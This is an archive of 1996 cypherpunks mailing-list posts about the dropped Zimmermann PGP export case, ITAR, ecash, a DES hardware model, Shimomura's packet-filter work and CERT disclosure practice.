>Pretty Good Privacy.  The investigation is closed."

>  -Philip Zimmermann
>   11 Jan 96
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMPDy4WV5hLjHqWbdAQEqYwQAm+o313Cm2ebAsMiPIwmd1WwnkPXEaYe9
>pGR5ja8BKSZQi4TAEQOQwQJaghI8QqZFdcctVYLm569I1/8ah0qyJ+4fOfUiAMda
>Sa2nvJR7pnr6EXrUFe1QoSauCASP/QRYcKgB5vaaOOuxyXnQfdK39AqaKy8lPYbw
>MfUiYaMREu4=
>=9CJW
>-----END PGP SIGNATURE-----
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cedomir Igaly <cigaly@srce.hr>
Date: Thu, 11 Jan 1996 23:59:10 +0800
To: cypherpunks@toad.com
Subject: Re: SSH for Windows
In-Reply-To: <199601110325.EAA25254@utopia.hacktic.nl>
Message-ID: <19960111.152756215F@srce.hr>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jan 1996 04:25:21 +0100, nobody@flame.alias.net (Anonymous)
said:

> Alex de Joode (usura@utopia.hacktic.nl) wrote:
> > : ...can be found at URL http://public.srce.hr/~cigaly/ssh/.  FYI.
> >
> > also on ftp.hacktic.nl/pub/replay/pub/incoming/ssh-1-2.zip
> >
> > (the .hr link is _very_ slow)
> >  -AJ-
> 
> *ahem* Where's the source code?  You don't expect us to trust a crypto
> implementation without source code, do you?
> 
> Not to mention that that would be a violation of the GPL...

Maybe you're right. You have my promise that I will not do such things
again.

Regards, C.I.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Fri, 12 Jan 1996 07:27:58 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199601112305.RAA00123@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>[This message has been signed by an auto-signing service.  A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
Am I the only one getting this message several times?
(\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/)
(http://www.oicu812.com  Maybe one of the    )
(        cheapest Internet services!         )
(andr0id@midwest.net           callsign: N9XLM)
(Finger andr0id@oicu812.com for public PGP Key)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 12 Jan 1996 10:24:16 +0800
To: cypherpunks@toad.com
Subject: Re: Certificates: limiting your liability with reuse limitations
In-Reply-To: <Pine.SUN.3.91.960108172534.14719h-100000@viper.law.miami.edu>
Message-ID: <199601120107.RAA21967@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


You write:

>Suppose I am a CA.  I am worried that by issuing a certificate with a 
>lifespan of more than 2 milliseconds I am opening myself up to unlimited 
>liability if for some reason, despite my best efforts, I issue an 
>erroneous certificate.

How do notaries public get around this liability problem?  It seems to me
that the checking done for a certificate might be similar to the checking
done by a notary - a glance at a driver's license, say.  Are they subject
to liability if they are fooled by fake ID?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 12 Jan 1996 07:12:40 +0800
To: Philip Zimmermann <prz@acm.org>
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601081035.KAA02532@maalox>
Message-ID: <9601112236.AA04283@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Good news, but lets not forget that winning the battle  isn't winning the war. 

The dropping of the case means that the legality of the ITAR restrictions goes 
untested. Had the case not been dropped it would have expired shortly under the 
statute of limitations. 

The real issue here is the abuse of the investigative powers of the FBI in 
support of their own political agenda. 

		Phill Hallam-Baker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 13 Jan 1996 01:13:17 +0800
To: cypherpunks@toad.com
Subject: Re: Shimomura on TV?
In-Reply-To: <199601120124.TAA04433@dal1820.computek.net>
Message-ID: <199601120146.RAA26258@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> "Working class trash"?  You are starting to sound like slick 
> willie..."the problem with this country is the working class" or some 
> such nonsense...

While I might put it in a somewhat less insulting manner, the central
thesis here is correct.  Society consists basically of a few percent 
of the people who see things one way because of strong ideological 
reasons.  This is balanced by another few percent who see things
the exact opposite because of strong ideological reasons.  

The remainder of the population generally follows whomever is perceived
to be running things.

Such people may safely be ignored during any revolution, although it 
is probably not a bright idea to use terms like "working class trash"
when describing them.  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@netaxs.com>
Date: Fri, 12 Jan 1996 07:26:30 +0800
To: cypherpunks@toad.com
Subject: Re: E-cash and Interest
In-Reply-To: <199601111911.AA16628@mail.crl.com>
Message-ID: <199601112252.RAA03445@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text


In one of many possible worlds, Frank O. Trotter, III did say:

> One note, under US banking regulation, "transaction accounts" fall
> under different rules than money market accounts, savings accounts,
> and NOW accounts.  Depending on the exact functionality desired, 
> and future regulation changes, there will be more or less incentive
> and/or legal ability to pay interest.

Yet more incentive for starting a bank somewhere in the free world...

> Given the current functionality of Ecash there will be little 
> incentive to hold balances on your hard drive once interest is
> available.  It is just too easy to move the money down when
> you need it.  Today there is no specific cost incentive between 
> the Mint and your hard drive.

Ecash really would be a lot nicer if it were implemented in a 
multi-issuer system with even more choices for storing your money, like 
in an ecash money market account at a non-issuing institution.  I can wait.

I agree that there's little point in storing ecash on your hard drive 
past a slush amount for purchases (hopefully the sw will be smart enough 
to advise people as to how much to keep on hand)...ecash still requires a 
check with the bank before spending any cash, correct?  Ecash on disk 
doesn't protect against denial-of-service-through-networking attacks 
then.  Keeping ecash at MTB, however, wouldn't be my reason for keeping 
it at a remote location.  Probably.

> It does not take a long leap to see that when the account and the
> Mint are merged, that since the Mint _is_ the account, PC/Internet 
> banking, debit and all other regular banking functionality can
> become immediately integrated!

If I had to conduct all of my banking in accordance with 
Mark Twain's fee schedule and legal restrictions, I'd be buying another 
mattress right now..well, maybe pillowcase.    

By integrating all of these services under Mark Twain Bank Ecash Mint, I 
would get all of the advantages of a rather pricey bank, 4-5% loss on all 
my deposits, minimal privacy protection, no FDIC protection, $2500 
initial deposit (not a problem for me, but it does keep many of the 
people I'd like to send money to out of the system..always a feature), 
and _tens_ of places to spend my ecash, only 4 or 5 of which that really 
sell things.

-- 
Ryan Lackey -*- ryan@pobox.com -*- http://www.netaxs.com/people/ryan/
"Calmly and impersonally, she, who would have hesitated to fire at an 
 animal, pulled the trigger and fired straight at the heart of a man 
 who had wanted to exist without the responsibility of consciousness."
                                       -- Ayn Rand, _Atlas Shrugged_.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 12 Jan 1996 09:33:26 +0800
To: "Douglas F. Elznic" <delznic@storm.net>
Subject: Re: Shimomura on TV?
In-Reply-To: <2.2.16.19960112000749.2b6f98f8@terminus.storm.net>
Message-ID: <9601120025.AA27664@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Douglas F. Elznic writes:
 > I am getting real sick of the media's portrayal of the
 > internet. They never say anything good about it.

The local news here in Austin, which in general seems to have a
terrible time filling up a 30-minute news presentation, had a big
story the other morning about how an Internet pedophile had been
caught.  It seems that some dude in Oregon was running a sting (I
think it was a reporter, not police, but I'm not sure) and some loser
in Austin took the bait and actually flew out there to meet the boy of
his dreams.  (Like I've said many times, it's a Real Good Thing most
criminals are so incredibly stupid.)

It turns out this guy worked at a school for handicapped children up
in Round Rock (the heart of Williamson County, the place hard-core
"old Austin" liberals like to think of as a portal to Redneck Hell).
So they start asking questions and they find some kids who say the guy
abused them (or whatever).  (The whole story might turn out to be
bogus, for all I know; it's disappeared from my sphere of awareness.)

My wife pointed out that though the "news" people made heavy (though
generally absurd) use of the Internet connection in the story, it left
her thinking that the Internet is a damn good tool for trolling out
undesirables like pedophiles (at least the stupid ones).  It makes it
a *hell* of a lot easier to sting people when *they'll pay for the
plane tickets*!  And of course, they can't do any actual damage over
the wire while you string 'em along.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Sat, 13 Jan 1996 04:41:30 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <9601120231.AA24628@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain



tcmay@got.net wrote:

>Yes, I think it likely that another case will be filed, a case the
>government senses is more winnable. In many ways, what Phil and/or some of
>his friends may or may not have done was too "stale." None of the Four
>Horsemen were involved directly, and Phil's case generated publicity that
>tended to make him a hero, not an Enemy of the People.


The question is, can Phil get through U.S. Customs at a point of entry
in a reasonable time, now?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@unique.outlook.net>
Date: Fri, 12 Jan 1996 08:17:27 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601112334.RAA20954@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> Good news, but lets not forget that winning the battle  isn't winning the war. 
> 
> The dropping of the case means that the legality of the ITAR restrictions goes 
> untested. Had the case not been dropped it would have expired shortly under the 
> statute of limitations. 
> 
> The real issue here is the abuse of the investigative powers of the FBI in 
> support of their own political agenda

Congradulations to Philip, but Phill(boy this is getting confussing) 
is right.

By dropping the case, the goverment avoids a high visiblity case that 
could change the rules.  

What happened to Phillip Zimmermann is unexcusable, but others must 
continue in his footsteps in order to win a decicive victory.

Gee, Anybody got a good public-domain Windoz version of PGP?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMPUxI0UffSIjnthhAQGkZQP/eTE7ngFyUPE3RqHB3spKmSiqneNw9WBy
5SkR4njN56ylUklkQjkxEtLijucugbsmiwIglBVaVaqwMKMoOjtbxyTrnoJj/8rk
YjvGn5Zgn4oD0fTegTKmSk3H2QzdzaHJo+l829KOAsvMOaaazsal3ml2+m5BGWpa
kwf11AglmOs=
=RPqk
-----END PGP SIGNATURE-----
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 12 Jan 1996 19:16:52 +0800
To: cypherpunks@toad.com
Subject: VHDL des model
Message-ID: <9601120256.AA24690@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
A mimimal DES chip implementation can be found at:
 
ripem.msu.edu:/pub/crypt/des/vhdl_des.tar.z
 
-rw-r-----  1 mrr      ftpsec      93630 Jan 12 02:01 vhdl_des.tar.z
 
It was written to go with a paper on DES Hardware I'm putting the
finishing touches on.  Note that this site requires a password to
belong to group ftpsec to download.
 
It will encrypt in 47 clocks (8 IP, 29 Key Schedule, 8 FP) or
decrypt in 46 clocks (28 Key Schedule), and will fit in some of
the larger FPGAs.
 
The paper, when finished, will describe various performance enhancements
such as double buffered IP and FP (which is covered by an Ultron patent,
although probably invalid), direct key schedule  (16 clocks), or
superscalar DES (approaching 1 clock per 64 bit block).

For any hardware wonks, this is done in Synopsys VSS, although the
README file contains enough information for other VHDL implmentations.

There are also 4 or 5 'C' programs for generating VHDL files of the
S Boxes in various configurations, and a sample 'C' DES program done
in 1988 for the original UNIX libdes (source included).  The 'C' program
can be used to generate equivalent structures for debugging your own
DES hardware variations.

The test vectors are from NBS Special Pub 500-20 (circa 1978).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Fri, 12 Jan 1996 10:07:38 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <9601120040.AA03530@toad.com>
Message-ID: <199601120100.TAA02304@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 	   We've made no progress. Phil has lots lots of time and gained
>    lots of grey hairs, and everyone who donated to his defense fund lost
>    money.
> 
> To the contrary, Phil won big.  He avoided going to Federal court as the
> defendant in a felony case.  That's what matters most.  Yes, a lot of
> time, money and effort was spent reaching this outcome, but none of it
> was wasted.
> 
> 	   The US can still harass people if they want, and make their
>    life hell.
> 
> Of course they can; they're the U.S. government.  No possible outcome of
> Phil's case would have changed this fact.  If the Federal government
> wishes to make your life miserable they can always do so.
> 
> The legal challenges to the ITAR regulations will continue forward in
> the various Federal courts, but that fight will no longer be on Phil
> Zimmermann's back.  

Mike Godwin can speak to this a lot better than I can, but I believe that 
by abandoning their case against PRZ, they have seriously weakened their 
case against anyone else that they feel has violated the ITAR in a 
similar manner - it's called "selective enforcement" and courts have been 
taking a dim view of that sort of thing.

I predict that you will start seeing a *lot* of crypto software showing up
on FTP sites within the next 24-48 hours, as news of this spreads. 
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPWywyS9AwzY9LDxAQF9zwP/Q8STXpBYNNJgvA5YUWDnxaV5YvmrS6SR
Zyp6KKyeEmCmMAJRqazoSkQWXuCbg8iPserEnxDMvZUDRkGxmO3EI2zX1Aqr5Am/
GXAPdGBxQ0tsCy7I4F4Icorgx7ZA8D0d6VJmBxCNu6NrmZvFvn1EMNLZjzqmlls/
ufHh+YG6zFI=
=OC4X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Fri, 12 Jan 1996 08:36:41 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: Shimomura on TV?
Message-ID: <2.2.16.19960112000749.2b6f98f8@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 1/10/96 -0500, John Young wrote:
>Someone just said that NBC's Dateline showed a snippet of 
>Shimomura on an upcoming show about rampant cyber-crime and 
>that he was the best hope against it, or something to that 
>effect. Did anyone see it and get the time and date?
>
>
>Anyone attend the Shimomura-Markoff lecture at Stanford today?
>
>
>Is this the media blitz for their pot-boiler? Can't wait to 
>slurp it.
>
>
>
>
>
>
Has anyone heard anything else about this? I am getting real sick of the
media's portrayal of the internet. They never say anything good about it. If
they were to mention C2's system they would say how it is a no-rules server
to hide thugs and pornos from the police. I am getting sick of watching this
trash. The whole realm of the internet and computers and their associated
areas are very dear to me I am sick of the media bludgeoning them to death.
 
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Jan 1996 17:50:57 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <ad1aff2216021004007f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 1/11/96, sameer wrote:
>        We've made no progress. Phil has lots lots of time and gained
>lots of grey hairs, and everyone who donated to his defense fund lost
>money.
>        The US can still harass people if they want, and make their
>life hell.

Yes, I think it likely that another case will be filed, a case the
government senses is more winnable. In many ways, what Phil and/or some of
his friends may or may not have done was too "stale." None of the Four
Horsemen were involved directly, and Phil's case generated publicity that
tended to make him a hero, not an Enemy of the People.

I would look for something like a prosecution of a remailer operator,
though only after laws are passed making it illegal to remail certain
items. (Right now there is no law against redirecting a message, so
prosecution would be difficult.)

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 12 Jan 1996 08:59:13 +0800
To: Philip Zimmermann <prz@acm.org>
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601081035.KAA02532@maalox>
Message-ID: <199601120022.TAA23574@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations!

You must be very relieved, as are the rest of us in the cryptographic
community in the US.

One question, though.  In your comments, you write
      I'd also like to thank Joe Burton, counsel for the co-defendant.
This raises the obvious question - do you know if the entire case has
been dropped, or have you just been eliminated as a target with the
possibility still open that others may yet be indicted?

Again, my congratulations.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 12 Jan 1996 09:00:32 +0800
To: mianigand@unique.outlook.net (Michael C. Peponis)
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601112334.RAA20954@unique.outlook.net>
Message-ID: <199601120023.TAA22279@homeport.org>
MIME-Version: 1.0
Content-Type: text


Michael C. Peponis wrote:

| What happened to Phillip Zimmermann is unexcusable, but others must
| continue in his footsteps in order to win a decicive victory.
| 
| Gee, Anybody got a good public-domain Windoz version of PGP?

	If someone really is looking to get in trouble for exporting
crypto software, I'd suggest that they consider Crypto++ or Cryptolib
as good things to export.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 12 Jan 1996 19:52:59 +0800
To: cypherpunks@toad.com
Subject: Shimomura on BPF, NSA, Crypto
Message-ID: <199601120029.TAA28014@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Shimomura on BPF, NSA and Crypto:

   One of the tools I modified for my work was a sophisticated
   piece of software called the Berkeley Packet Filter. ...
   Unlike the original BPF, my version was designed to bury
   itself inside the operating system of a computer and watch
   for certain information as it flowed through the computer
   from the Internet. When a packet from a certain address, or
   for that matter any other desired piece of information
   designated by the user flashed by, BPF would grab it and
   place it in a file where it could be kept for later
   viewing.

   I had developed my initial version of the faster BPF in the
   expectation that I would receive additional research
   funding for the work from the National Security Agency. The
   Agency had begun supporting my work under a Los Alamos
   National Labs research grant in 1991, and had promised to
   extend their support for my work, but the funding was never
   forthcoming. I developed the tool, but after I completed
   the work, in early 1994, the bureaucrats in the agency
   reneged on funding.

   The idea of working with the NSA is controversial in the
   community of security professionals and civil libertarians,
   many of whom regard the NSA as a high-tech castle of
   darkness.

   Libertarian by inclination or by the influence of their
   colleagues, the nation's best computer hackers tend to
   possess a remarkable sensitivity to even the slightest hint
   of a civil liberties violation. They view with deep
   distrust the work of the National Security Agency, which
   has the twin missions of electronic spying around the globe
   and protecting the government's computer data. This
   distrust extends to anyone who works with the agency. Am I
   contaminated because I accepted research funding from the
   NSA? The situation reminds me of the scene in the movie Dr.
   Strangelove where General Jack D. Ripper is obsessed by the
   idea of his bodily fluids being contaminated. I think the
   idea of guilt by association is absurd.

   My view is very different. First of all, I don't believe in
   classified research and so I don't do it. The work I was
   undertaking on packet-filtering tools was supposed to be
   funded by the agency for public release. The tools were to
   be made widely available to everyone, to use against the
   bad guys who were already using similar tools to invade
   people's privacy and compromise the security of machines on
   the Internet.

   But even more to the point, I believe that the agency,
   rather than inherently evil, is essentially inept. Many
   people are frightened of the NSA, not realizing that it is
   like any other bureaucracy, with all of a bureaucracy's
   attendant failings. Because the NSA staff lives in a
   classified world, the government's normal system of checks
   and balances doesn't apply. But that doesn't mean that
   their technology outpaces the open computer world; it just
   means they're out of touch and ponderous.

   In any case, I feel strongly that tools like BPF are
   absolutely essential if the Internet is to have real
   security, and if we are to have the ability to trace
   vandals through the Net. If people are concerned that
   individual privacy is at stake, they should probably worry
   less about who should have the right to monitor the
   networks, and instead focus their efforts on making
   cryptographic software widely available. If information is
   encrypted it doesn't matter who sees it if they can't read
   the code. Cryptography is another example of my point that
   a tool is just a tool. It was, after all, used primarily by
   kings, generals, and spies until only two decades ago. Then
   work done by scientists at Stanford, MIT, and UCLA, coupled
   with the advent of the inexpensive personal computer, made
   encryption software available to anyone. As a result, the
   balance of power is dramatically shifting away from the NSA
   back toward the individual, and toward protecting our civil
   liberties.

   ["Takedown," pp. 102-04]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 12 Jan 1996 09:30:44 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601112329.PAA15617@infinity.c2.org>
Message-ID: <9601120029.AA04608@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain




>	We've made no progress. Phil has lots lots of time and gained
>lots of grey hairs, and everyone who donated to his defense fund lost
>money.

No progress? At least Phil is not going off on a trip to Alcatraz to
make small ones out of big ones. Thats a big plus in many peoples books.

One of the most overdue reforms of the US government is the renaming of
the FBI building to remove the name of J Edgar Hoover. The abuse of power 
under his administration of the FBI continues to poison the US polity
by providing clear proof to many citizens that their government cannot be 
trusted. While the abuses of Hoover continue to be commemerated in this
fashion there can be little public confidence in any claims of reform.

>	The US can still harass people if they want, and make their
>life hell.

Not just the US government. There are many crooks out there who have attempted
or are attempting worse. At least with the government there are means to
bring it to heel eventually.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 12 Jan 1996 09:36:49 +0800
To: cypherpunks@toad.com
Subject: Re: Shimomura on TV?
In-Reply-To: <2.2.16.19960112000749.2b6f98f8@terminus.storm.net>
Message-ID: <9601120038.AA04474@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Has anyone heard anything else about this? I am getting real sick of the
>media's portrayal of the internet. They never say anything good about it.

At the last World Wide Web consortium meeting I said that the media were
pumping up the bubble and their favourite game is to see if they can 
destroy what they have the arrogance to imagine they created.

That is why we have to replace the press. Consider this in the next 
election voters on the Internet will be able to read the press releases
of the candidates without the press filtering them. There is the potential
for the internet citizens to participate in shaping the political agenda 
- another role the press likes to usurp for itself.

I recently held a workshop on political use of the Web which was attended
by Republican and Democrat party workers and political activists from
6 other countries. One thing that suprized me was the consensus amongst the
politicians that the differences between them were smaller than their 
differences with the press.

To take one example. A collumnist in the New York Times recently received
much coverage for calling the First Lady "a congenital liar". Yet little 
mention is made of the fact that said collumnist worked for both Nixon and
Spiro Agnew and has never condemned either for their actions. 


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Fri, 12 Jan 1996 17:09:08 +0800
To: sameer@c2.org
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601112329.PAA15617@infinity.c2.org>
Message-ID: <9601120040.AA03530@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: sameer <sameer@c2.org>
   Date: Thu, 11 Jan 1996 15:29:11 -0800 (PST)
   Cc: prz@acm.org, cypherpunks@toad.com
   X-Mailer: ELM [version 2.4 PL20]
   Mime-Version: 1.0
   Content-Type: text/plain; charset=US-ASCII
   Content-Transfer-Encoding: 7bit
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

	   We've made no progress. Phil has lots lots of time and gained
   lots of grey hairs, and everyone who donated to his defense fund lost
   money.

To the contrary, Phil won big.  He avoided going to Federal court as the
defendant in a felony case.  That's what matters most.  Yes, a lot of
time, money and effort was spent reaching this outcome, but none of it
was wasted.

	   The US can still harass people if they want, and make their
   life hell.

Of course they can; they're the U.S. government.  No possible outcome of
Phil's case would have changed this fact.  If the Federal government
wishes to make your life miserable they can always do so.

The legal challenges to the ITAR regulations will continue forward in
the various Federal courts, but that fight will no longer be on Phil
Zimmermann's back.  

					--bal








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Fri, 12 Jan 1996 17:09:25 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Microsoft continues to mislead public about Windows security
Message-ID: <199601120042.TAA18188@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601100451.UAA13211@infinity.c2.org>,
 <kolivet@alpha.c2.org> wrote:
> On Tue, 9 Jan 1996, Frank Willoughby wrote:
> > When a system is breached or a CERT Advisory is issued, this is a major
> > embarassment for the company.
> 
> What are CERT's criteria for a bulletin to be issued?  Would the previously
> mentioned Windows NT and Windows 95 security bugs qualify?

CERT normally won't publish a security warning until the manufacturers
have fixed the bug & offered a patch.  So I doubt the Win95/NT bugs will
be announced by CERT tomorrow.

If you want to publish a bug, CERT is probably not the best place to go.
CERT often ends up sitting on bugs for ages, because nobody knows about
the hole, so nobody can pressure the vendors to fix 'em, so CERT refuses
to release a bulletin-- a vicious cycle.

IMHO, embarassing public pressure often seems to be the quickest way to
get attention & fixes from uncooperative vendors...  But then again, that's
the old "full disclosure" (and "security through obscurity") debate(s).

- -- Dave "a believer in security through caffeine" Wagner
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPWugyoZzwIn1bdtAQFYrgGAyQhuXiFCK36qFdJzEw4PSp2f/oIvpoi+
8peJmKjle86aBlY20SGYQBQoactyKcza
=3NOo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Fri, 12 Jan 1996 10:16:14 +0800
To: cypherpunks@toad.com
Subject: The cost of victory?
Message-ID: <199601120108.RAA13368@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anyone care to estimate the *true cost* to PRZ for this victory?

Haven't the bad guys made their point?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPWtdGeikzgqLB7pAQHGfAQAifBSfY7fSLccdhpdWnNSW/prMdKyPaRF
XqEHfc9L+g2rYggYxWFXAZYBef2UjX8sQV6IZG7YN4wIT2IlifYa9GO0xVXC5LiC
Diu0GPgXD6mg2WInfhzedCQNOfby+LF+oEo04whvz1dkMjo8ntEsczjY82VRYBh1
wUmdZyBsVNE=
=RHPc
-----END PGP SIGNATURE-----
***Preserve, Protect and Defend the private use of Strong Crypto***
                 * * * PGP for the masses * * * 
Finger mjwohler@netcom.com for Marc Wohler's public key
fingerprint= F1 70 23 13 91 B5 10 63 0F CF 33 AD BE E6 7B B6





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@unique.outlook.net>
Date: Fri, 12 Jan 1996 10:24:03 +0800
To: cypherpunks@toad.com
Subject: Re: Shimomura on TV?
Message-ID: <199601120102.TAA21599@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain



> Has anyone heard anything else about this? I am getting real sick of the
> media's portrayal of the internet. They never say anything good about it. If
> they were to mention C2's system they would say how it is a no-rules server
> to hide thugs and pornos from the police. I am getting sick of watching this
> trash. The whole realm of the internet and computers and their associated
> areas are very dear to me I am sick of the media bludgeoning them to death.

Douglas,

Why let it bother you? You must understand that the majority of the 
population of the United States is working class trash, the news 
media is just peddeling to the masses, just like the morons that hold 
elected office.

They can keep up the bitching, but that's a good thing, I encourage 
the spread of this kind of disinformation, it keeps even more of the 
masses from getting on for fear of being offenced.

Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
